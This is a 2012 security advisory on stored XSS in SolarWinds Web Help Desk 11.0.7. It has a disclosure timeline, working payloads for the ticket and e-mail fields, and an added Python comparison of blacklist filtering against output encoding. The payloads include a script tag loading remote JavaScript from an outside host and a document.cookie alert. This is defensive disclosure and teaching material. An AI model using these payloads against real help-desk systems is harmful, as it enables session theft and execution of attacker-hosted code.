Web Help Desk by SolarWinds – Stored XSS

A stored XSS vulnerability was found in the Web Help Desk by SolarWinds script. The flaw makes it possible to run iframe and JavaScript code.

# Author: loneferret of Offensive Security
# Product: Web Help Desk by SolarWinds
# Version: 11.0.7 (older versions may be affected)
# Vendor Site: http://www.webhelpdesk.com
# Software Download: http://www.webhelpdesk.com/help-desk-software/

# Discovered: August 18th 2012
# Disclosure:
# August 19th 2012: Reported to CERT
# August 24th 2012: Public disclosure date is October 8th 2012
# August 28th 2012: Vendor responded, should fix by disclosure date
# August 29th 2012: Vendor asked information on Stored XSS in 'Rejected E-Mail Section'
# August 29th 2012: Sent vendor instructions on how to trigger XSS (not fully documented here)*
# September 21 2012: Vendor sends pre-release version to test (11.0.8)
# September 23 2012: Replied. Still XSS in "Rejected E-Mail Section" but not in Tickets
# September 24 2012: Vendor replied saying "Rejected E-Mail" XSS slated to be fixed in next version
# October 8th 2012: Public release

# Vulnerabilities:
# Stored XSS via client web ticket submit system
# Affected fields: Subject & Request Details
# Payload: <script type="text/javascript">alert(document.cookie);</script>

# Stored XSS via E-Mail
# Tickets created automatically via e-mail will also trigger the XSS when viewed.
# The following payloads are triggered with the default regular expression filters in place.
# Body field
# Payloads:
<script type="text/javascript" src="http://ha.ckers.org/xss.js"></script>

<iframe src="javascript:alert('XSS Body');" width="320" height="240"></iframe>

# Subject field
# Payloads:
**
<script type="text/javascript" src="http://ha.ckers.org/xss.js"></script>
<iframe src="javascript:alert('XSS Subject');" width="320" height="240"></iframe>

# *Viewing rejected e-mails via the 'email.eml' in the "Raw Message Data" section.
# Some payloads:
# <script type="text/javascript" src="http://ha.ckers.org/xss.js"></script>

# <XSS STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'>

# **To trigger XSS must click on "My Tickets" or "Group Tickets"
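The advisory notes that the payloads above get past the product's default regular-expression filters. The following added example (not part of the advisory or of the vendor's code) takes the payloads quoted above as test input and compares a constructed, hypothetical blacklist regex of that kind against context-aware HTML output encoding, the fix a defender would apply to the Subject and Request Details fields before rendering them.

```python
import html
import re

# Payloads quoted in the advisory above, used here only as test input.
ADVISORY_PAYLOADS = [
    '<script type="text/javascript">alert(document.cookie);</script>',
    '<script type="text/javascript" src="http://ha.ckers.org/xss.js"></script>',
    '<iframe src="javascript:alert(\'XSS Body\');" width="320" height="240"></iframe>',
    '<XSS STYLE=\'no\\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))\'>',
]

# Constructed blacklist filter that strips <script> tags (an illustration of the
# filter type the advisory describes, NOT the vendor's actual regular expression).
SCRIPT_TAG_RE = re.compile(r'<\s*/?\s*script\b[^>]*>', re.IGNORECASE)

def blacklist_filter(field: str) -> str:
    """Remove <script> tags and nothing else, as a tag blacklist would."""
    return SCRIPT_TAG_RE.sub('', field)

def encode_for_html_body(field: str) -> str:
    """Context-aware output encoding for a value rendered as HTML text:
    every <, >, &, " and ' becomes an entity, so no markup can form."""
    return html.escape(field, quote=True)

# Coarse check used to judge each defense: does anything that still parses
# as an HTML tag survive in the rendered output?
TAG_RE = re.compile(r'<[A-Za-z!/][^>]*>')

def still_contains_markup(rendered: str) -> bool:
    return TAG_RE.search(rendered) is not None

def compare_defenses(payloads=ADVISORY_PAYLOADS):
    """For each payload, report whether each defense leaves active markup behind."""
    results = []
    for p in payloads:
        results.append({
            'payload': p,
            'blacklist_leaks': still_contains_markup(blacklist_filter(p)),
            'encoding_leaks': still_contains_markup(encode_for_html_body(p)),
        })
    return results

if __name__ == '__main__':
    for r in compare_defenses():
        print(f"blacklist leaks={r['blacklist_leaks']!s:5} "
              f"encoding leaks={r['encoding_leaks']!s:5}  {r['payload'][:60]}")
```

The blacklist stops only the two `<script>` payloads and lets the iframe and the STYLE-expression variant through, while output encoding neutralizes all four; a blacklist can only ever enumerate what it already knows.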
